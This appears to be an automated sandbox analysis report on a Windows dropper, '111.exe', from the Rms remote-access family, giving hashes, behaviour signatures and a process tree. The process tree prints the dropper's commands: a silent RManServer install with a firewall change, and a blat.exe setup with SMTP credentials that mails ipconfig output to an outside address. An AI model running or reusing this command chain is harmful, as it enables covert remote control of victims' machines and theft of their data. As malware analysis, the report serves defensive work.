Overview
overview
10Static
static
5111.exe
windows7-x64
10111.exe
windows10-2004-x64
10Word/HookDrv.dll
windows7-x64
3Word/HookDrv.dll
windows10-2004-x64
3Word/RManF...nt.exe
windows7-x64
3Word/RManF...nt.exe
windows10-2004-x64
3Word/RManServer.exe
windows7-x64
10Word/RManServer.exe
windows10-2004-x64
10blat.dll
windows7-x64
3blat.dll
windows10-2004-x64
3blat.exe
windows7-x64
3blat.exe
windows10-2004-x64
3Analysis
-
max time kernel
147s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 13:47
Behavioral task
behavioral1
Sample
111.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
111.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Word/HookDrv.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Word/HookDrv.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Word/RManFUSClient.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
Word/RManFUSClient.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Word/RManServer.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
Word/RManServer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
blat.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
blat.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
blat.exe
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
blat.exe
Resource
win10v2004-20241007-en
General
-
Target
111.exe
-
Size
21KB
-
MD5
82427df03213df677115af3d9bc8d134
-
SHA1
f2870bd0ebba0d5bf4b8b06099047cdbfb5254b3
-
SHA256
8433cab0e54e801a2be34fb149acf6bf8b87a60828eefe47af05edff762fe586
-
SHA512
3141435c43fe6dc7f76786455d8daa8af2e99a56936cab76cbfbd867ef77fdb2999a32f7d73213a513bb1ee5a5a2192d52f5163750647c5386d2ddabdaad1fa3
-
SSDEEP
384:UIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZKqaNJawcudoq:URGuY2P0Vo6r7SiAwyrMRjbMnbcuyD7h
Malware Config
Signatures
-
Rms family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 111.exe -
resource yara_rule behavioral2/memory/3316-0-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/3316-13-0x0000000000400000-0x0000000000410000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language blat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language blat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManServer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManFUSClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManServer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManServer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManServer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RManFUSClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1108 ipconfig.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1708 regedit.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1120 RManServer.exe 1120 RManServer.exe 1120 RManServer.exe 1120 RManServer.exe 1328 RManFUSClient.exe 1328 RManFUSClient.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1788 RManServer.exe Token: SeDebugPrivilege 3964 RManServer.exe Token: SeTakeOwnershipPrivilege 1120 RManServer.exe Token: SeTcbPrivilege 1120 RManServer.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 3316 wrote to memory of 4696 3316 111.exe 84 PID 3316 wrote to memory of 4696 3316 111.exe 84 PID 3316 wrote to memory of 4696 3316 111.exe 84 PID 4696 wrote to memory of 2396 4696 cmd.exe 87 PID 4696 wrote to memory of 2396 4696 cmd.exe 87 PID 4696 wrote to memory of 2396 4696 cmd.exe 87 PID 4696 wrote to memory of 1708 4696 cmd.exe 88 PID 4696 wrote to memory of 1708 4696 cmd.exe 88 PID 4696 wrote to memory of 1708 4696 cmd.exe 88 PID 4696 wrote to memory of 4352 4696 cmd.exe 90 PID 4696 wrote to memory of 4352 4696 cmd.exe 90 PID 4696 wrote to memory of 4352 4696 cmd.exe 90 PID 4696 wrote to memory of 1788 4696 cmd.exe 91 PID 4696 wrote to memory of 1788 4696 cmd.exe 91 PID 4696 wrote to memory of 1788 4696 cmd.exe 91 PID 4696 wrote to memory of 3964 4696 cmd.exe 92 PID 4696 wrote to memory of 3964 4696 cmd.exe 92 PID 4696 wrote to memory of 3964 4696 cmd.exe 92 PID 1120 wrote to memory of 1328 1120 RManServer.exe 94 PID 1120 wrote to memory of 1328 1120 RManServer.exe 94 PID 1120 wrote to memory of 1328 1120 RManServer.exe 94 PID 1120 wrote to memory of 3012 1120 RManServer.exe 95 PID 1120 wrote to memory of 3012 1120 RManServer.exe 95 PID 1120 wrote to memory of 3012 1120 RManServer.exe 95 PID 4696 wrote to memory of 2660 4696 cmd.exe 96 PID 4696 wrote to memory of 2660 4696 cmd.exe 96 PID 4696 wrote to memory of 2660 4696 cmd.exe 96 PID 4696 wrote to memory of 1108 4696 cmd.exe 97 PID 4696 wrote to memory of 1108 4696 cmd.exe 97 PID 4696 wrote to memory of 1108 4696 cmd.exe 97 PID 4696 wrote to memory of 1980 4696 cmd.exe 99 PID 4696 wrote to memory of 1980 4696 cmd.exe 99 PID 4696 wrote to memory of 1980 4696 cmd.exe 99 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2396 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\111.exe"C:\Users\Admin\AppData\Local\Temp\111.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BECC.tmp\111.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\attrib.exeattrib +h +s +r "Word"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2396
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "111.reg"3⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1708
-
-
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe"Word\RManServer.exe" /server /firewall3⤵
- System Location Discovery: System Language Discovery
PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe"Word\RManServer.exe" /server /silentinstall3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe"Word\RManServer.exe" /server /start3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\blat.exeblat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u LIMON12000 -pw nat123453⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:1108
-
-
C:\Users\Admin\AppData\Local\Temp\blat.exeblat.exe ip.txt -to [email protected].3⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exeC:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe"C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exeC:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe /tray2⤵
- System Location Discovery: System Language Discovery
PID:3012
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
396B
MD5b348cd1535602f34657360ef9a3e42a1
SHA143c5823f1d14d28c6c3ca2e20648256715ba97ca
SHA256318dbd13350c6250369cb98d7c768ef8959df150852728aedee011c95d191dc5
SHA5127b50f003f8492709b1ee67ec5b76f8a8d1b82977499197ec35b75606da397e4f2d38578c1cbd1314706716088c0f4d1a22cf7bd7fc93476c637b60f6ac3ee9e8
-
Filesize
1022B
MD5ec8784f2d9ffaff069ae0bbc77de9fe7
SHA1f222b3c118d1c9b72fa0c3d772008634aaf9c907
SHA25648f6ba9b89fb5ccd2c3ce40c79dc8366146a4c6ffba1f96b924539ab2e1fa36e
SHA5126752b08d0a635573646c2bf79e7968e8292634c6a0a331f2742dea624b9568eb69ed3785e502d6ac20a6b6221ba1fe8b36129efbe3c24e275b4c08e79687f447